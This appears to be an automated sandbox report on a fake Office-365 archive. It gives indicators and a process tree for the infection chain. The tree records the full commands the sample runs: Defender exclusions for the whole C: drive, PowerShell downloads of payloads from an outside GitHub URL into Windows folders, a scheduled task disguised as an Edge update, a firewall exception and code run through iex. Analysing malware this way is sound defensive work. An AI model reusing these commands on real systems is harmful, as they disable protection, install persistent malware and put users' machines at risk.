pid Process 816 reg.exe 544 reg.exe 2024 reg.exe 5076 reg.exe 5060 reg.exe 1640 reg.exe 4360 reg.exe 1640 reg.exe 1952 reg.exe 4704 reg.exe 2960 reg.exe 4408 reg.exe 4856 reg.exe 980 reg.exe 844 reg.exe 3984 reg.exe 2884 reg.exe 892 reg.exe 4684 reg.exe 3896 reg.exe 2140 reg.exe 3432 reg.exe 3384 reg.exe 3280 reg.exe 1952 reg.exe 400 reg.exe 4844 reg.exe 2272 reg.exe 1452 reg.exe 3472 reg.exe 4548 reg.exe 3544 reg.exe 1044 reg.exe 2320 reg.exe 2636 reg.exe 5084 reg.exe 3960 reg.exe 2708 reg.exe 780 reg.exe 996 reg.exe 4360 reg.exe 468 reg.exe 5064 reg.exe 3984 reg.exe 892 reg.exe 2732 reg.exe 2320 reg.exe 3592 reg.exe 5076 reg.exe 3004 reg.exe 3960 reg.exe 996 reg.exe 4036 reg.exe 3280 reg.exe 3896 reg.exe 4388 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2736 NOTEPAD.EXE -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
4040 schtasks.exe
4836 schtasks.exe
3424 schtasks.exe
3880 schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process
3928 chrome.exe
4468 powershell.exe
1648 powershell.exe
2736 powershell.exe
4612 powershell.exe
3468 powershell.exe
1516 powershell.exe
4704 powershell.exe
4624 powershell.exe
2708 powershell.exe
4040 powershell.exe
1480 powershell.exe
4036 powershell.exe
4856 powershell.exe
5800 powershell.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process
3928 chrome.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeShutdownPrivilege 3928 chrome.exe
Token: SeCreatePagefilePrivilege 3928 chrome.exe
Token: SeRestorePrivilege 2864 7zG.exe
Token: 35 2864 7zG.exe
Token: SeSecurityPrivilege 2864 7zG.exe
Token: SeDebugPrivilege 4468 powershell.exe
Token: SeIncreaseQuotaPrivilege 4996 WMIC.exe
Token: SeSecurityPrivilege 4996 WMIC.exe
Token: SeTakeOwnershipPrivilege 4996 WMIC.exe
Token: SeLoadDriverPrivilege 4996 WMIC.exe
Token: SeSystemProfilePrivilege 4996 WMIC.exe
Token: SeSystemtimePrivilege 4996 WMIC.exe
Token: SeProfSingleProcessPrivilege 4996 WMIC.exe
Token: SeIncBasePriorityPrivilege 4996 WMIC.exe
Token: SeCreatePagefilePrivilege 4996 WMIC.exe
Token: SeBackupPrivilege 4996 WMIC.exe
Token: SeRestorePrivilege 4996 WMIC.exe
Token: SeShutdownPrivilege 4996 WMIC.exe
Token: SeDebugPrivilege 4996 WMIC.exe
Token: SeSystemEnvironmentPrivilege 4996 WMIC.exe
Token: SeRemoteShutdownPrivilege 4996 WMIC.exe
Token: SeUndockPrivilege 4996 WMIC.exe
Token: SeManageVolumePrivilege 4996 WMIC.exe
Token: 33 4996 WMIC.exe
Token: 34 4996 WMIC.exe
-
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process
3928 chrome.exe
2864 7zG.exe
116 setup.exe
6004 OfficeClickToRun.exe
5996 OfficeC2RClient.exe
-
Suspicious use of SendNotifyMessage 27 IoCs
pid Process
3928 chrome.exe
6004 OfficeClickToRun.exe
-
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process
4152 Csetup.exe
2220 Integrator.exe
1648 setup.exe
116 setup.exe
5232 OfficeClickToRun.exe
5588 OfficeClickToRun.exe
6004 OfficeClickToRun.exe
5996 OfficeC2RClient.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 3928 wrote to memory of 2232 3928 chrome.exe 83
PID 3928 wrote to memory of 1332 3928 chrome.exe 84
PID 3928 wrote to memory of 4736 3928 chrome.exe 85
PID 3928 wrote to memory of 2452 3928 chrome.exe 86
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1097612223544836197/1316830236247326831/Office-365.rar?ex=675c7939&is=675b27b9&hm=88f64580fbc57e5e15fb335ded817035c026a64f2f2dfa824c029b6334369515&1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffedd6ccc40,0x7ffedd6ccc4c,0x7ffedd6ccc582⤵PID:2232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2028,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2032 /prefetch:22⤵PID:1332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1816,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:32⤵PID:4736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2264 /prefetch:82⤵PID:2452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:12⤵PID:2588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:82⤵PID:1692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:82⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1628
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4036
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Office-365\" -spe -an -ai#7zMap23142:82:7zEvent194391⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2864
-
C:\Users\Admin\Downloads\Office-365\myprograme.exe"C:\Users\Admin\Downloads\Office-365\myprograme.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
PID:2992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\run_setup.bat"2⤵
- System Location Discovery: System Language Discovery
PID:4224 -
C:\Windows\SysWOW64\cmd.execmd /c "Csetup.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\Csetup.exeCsetup.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak6⤵
- Delays execution with timeout.exe
PID:4364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2736
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:4848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/ZUMBAA' -OutFile 'C:\Windows\System32\vcruntime143_thread.dll'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5076
-
-
C:\Windows\system32\rundll32.exerundll32.exe vcruntime143_thread.dll,Start6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
PID:3468 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat7⤵PID:4704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/VAN' -OutFile 'C:\Windows\Help\service\wininitt.exe'"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
-
C:\Windows\Help\service\wininitt.exeC:\Windows\Help\service\wininitt.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1100 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Help\service\wininitt.exe" "wininitt.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3652
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\active.bat""2⤵
- System Location Discovery: System Language Discovery
PID:1040 -
C:\Windows\system32\cmd.execmd /v:on /c echo(^!param^!3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /R "[| ` ~ ! @ % \^ & ( ) \[ \] { } + = ; ' , |]*^"3⤵PID:3108
-
-
C:\Windows\system32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WinMgmt /v Start3⤵
- Modifies registry key
PID:468
-
-
C:\Windows\system32\find.exefind /i "0x4"3⤵PID:4036
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\system32\find.exefind /i "ComputerSystem"3⤵PID:2864
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c $ExecutionContext.SessionState.LanguageMode3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
C:\Windows\system32\find.exefind /i "Full"3⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query HKU\S-1-5-193⤵PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop3⤵
- System Location Discovery: System Language Discovery
PID:1724 -
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:4836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver3⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3960 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR4⤵PID:3644
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:1704
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:544
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:4524
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4364
-
-
C:\Windows\system32\reg.exereg query "HKCU\Console" /v ForceV23⤵PID:1952
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\skus3⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\system32\sc.exesc query osppsvc3⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\addons 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"3⤵PID:3468
-
-
C:\Windows\system32\mode.commode con cols=80 lines=343⤵PID:544
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:5076
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1952
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:4036
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:1468
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1044
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2912
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:1872
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1640
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:4468
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:3468
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2628
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:400
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:4036
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:3880
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2192
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2708
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:4008
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:5060
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2724
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1640
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:3360
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:1468
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1952
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:3880
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:4404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %B in (1) do rem"3⤵
- System Location Discovery: System Language Discovery
PID:1516
-
-
C:\Windows\system32\mode.com mode con cols=100 lines=34 3⤵ PID:2708
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3468
-
-
C:\Windows\system32\Wbem\WMIC.exe WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\Sysnative\SppExtComObjHook.dll" Force=True 3⤵ PID:1044
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:2028
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:400
-
-
C:\Windows\system32\net.exenet stop sppsvc /y3⤵PID:3960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y4⤵PID:4036
-
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:664
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2044
-
-
C:\Windows\system32\sc.exesc stop sppsvc3⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$d='C:\Windows\System32';$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[1]);X 2"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4704 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Temp\kcfrzlkw\kcfrzlkw.cmdline"4⤵PID:4408
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\Temp\RES49.tmp" "c:\Windows\Temp\kcfrzlkw\CSC244F468DF46343F2B574EDD66152B10.TMP"5⤵PID:3920
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\active.bat""2⤵
- System Location Discovery: System Language Discovery
PID:3572 -
C:\Windows\system32\cmd.execmd /v:on /c echo(^!param^!3⤵PID:3868
-
-
C:\Windows\system32\findstr.exefindstr /R "[| ` ~ ! @ % \^ & ( ) \[ \] { } + = ; ' , |]*^"3⤵PID:4040
-
-
C:\Windows\system32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WinMgmt /v Start3⤵
- Modifies registry key
PID:780
-
-
C:\Windows\system32\find.exefind /i "0x4"3⤵PID:3280
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value3⤵PID:4036
-
-
C:\Windows\system32\find.exefind /i "ComputerSystem"3⤵PID:2724
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c $ExecutionContext.SessionState.LanguageMode3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\system32\find.exefind /i "Full"3⤵PID:2736
-
-
C:\Windows\system32\reg.exe reg query HKU\S-1-5-19 3⤵ PID:4740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop3⤵
- System Location Discovery: System Language Discovery
PID:3280 -
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver3⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR4⤵PID:5060
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:5000
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:3896
-
-
C:\Windows\system32\reg.exe reg query "HKCU\Console" /v ForceV2 3⤵ PID:2960
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:1200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\skus3⤵
- System Location Discovery: System Language Discovery
PID:1560
-
-
C:\Windows\system32\sc.exesc query osppsvc3⤵
- Launches sc.exe
PID:468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\addons 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"3⤵PID:4912
-
-
C:\Windows\system32\mode.com mode con cols=80 lines=34 3⤵ PID:2732
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4704
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:816
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:2140
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4688
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:3004
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:1816
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4624
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:780
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:844
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:2956
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2276
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:4612
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:544
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:3228
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:5060
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:3960
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:1340
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2272
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:1552
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2236
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:3472
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:468
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2240
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4360
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:2080
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:3988
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /v VerifierFlags3⤵PID:1300
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /v VerifierFlags3⤵PID:2944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %B in (1) do rem"3⤵
- System Location Discovery: System Language Discovery
PID:816
-
-
C:\Windows\system32\mode.com mode con cols=100 lines=34 3⤵ PID:4528
-
-
